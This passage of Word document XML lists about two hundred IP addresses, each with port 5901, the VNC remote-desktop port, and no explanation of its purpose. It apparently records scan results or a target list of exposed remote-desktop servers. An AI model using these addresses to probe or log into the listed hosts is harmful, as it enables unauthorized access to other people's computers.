    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.166:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">117.103.97.167:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.215:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.206:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.187:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.207:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.210:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.168:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.185:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.174:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.214:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.183:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.189:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.191:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.101.65:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.220:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.192:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.217:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.180:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.208:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">117.103.97.213:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.122.165.33:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">118.122.80.230:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.123.173.91:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.123.255.136:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.144.76.149:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.144.77.121:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.212.132.99:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.212.160.5:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.212.168.135:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.212.168.134:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.212.168.133:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.195.132.173:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.244.191.51:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.244.211.9:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.244.211.7:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.244.211.8:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.244.239.190:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">119.42.75.123:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">118.254.9.158:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">119.147.156.153:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">119.147.156.152:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">120.28.38.242:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">121.10.139.241:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">121.10.139.237:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">121.12.120.72:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">121.14.199.248:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">121.101.221.231:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">121.205.90.83:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">121.205.90.72:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">121.205.90.71:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">121.205.91.30:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">121.205.91.7:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">121.229.209.87:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.116.50.192:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.102.44.134:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.224.223.231:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.11.245:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.104.82:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.104.56:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.104.30:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.104.120:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.104.108:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.104.86:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.104.85:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.104.84:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">122.226.104.83:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.104.87:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.104.113:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.104.54:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.117.37:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.117.33:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.117.17:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.104.31:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.117.14:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.117.35:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.117.36:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.117.15:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.117.89:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.117.22:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.117.92:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.117.125:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.117.38:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.117.91:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.117.16:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.117.122:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.117.88:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.117.109:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">122.226.117.113:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.104.81:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.104.80:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.206.165:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.226.225.202:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.228.196.106:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.228.242.140:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">122.229.28.106:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">123.150.45.102:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">123.150.174.200:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">123.172.125.3:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">123.172.125.2:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.31.206.138:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.31.204.170:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.82.208.121:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.114.98.234:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.127.49.111:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.127.49.91:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.127.117.234:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.202.136.90:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.202.136.77:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">124.202.141.66:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.202.141.69:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.202.141.68:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.202.141.236:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.202.141.28:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.202.141.235:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.205.75.213:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.205.75.240:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.205.241.82:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.207.214.150:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.207.138.234:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.207.150.92:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.219.26.29:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.232.138.61:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.226.232.82:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.238.235.47:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.238.235.48:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.238.235.50:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">124.238.235.49:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">125.46.23.231:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">125.64.99.12:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">125.67.66.248:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">125.77.201.83:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">125.90.192.4:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">125.89.65.69:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">125.91.251.177:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">125.126.174.132:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">165.228.37.172:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">157.159.232.56:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">171.8.142.83:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">171.107.80.212:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.6.2.91:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.6.0.131:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.6.2.199:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.6.2.197:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.6.2.195:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.6.2.198:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">175.6.2.196:5901 </w:t>
      </w:r>
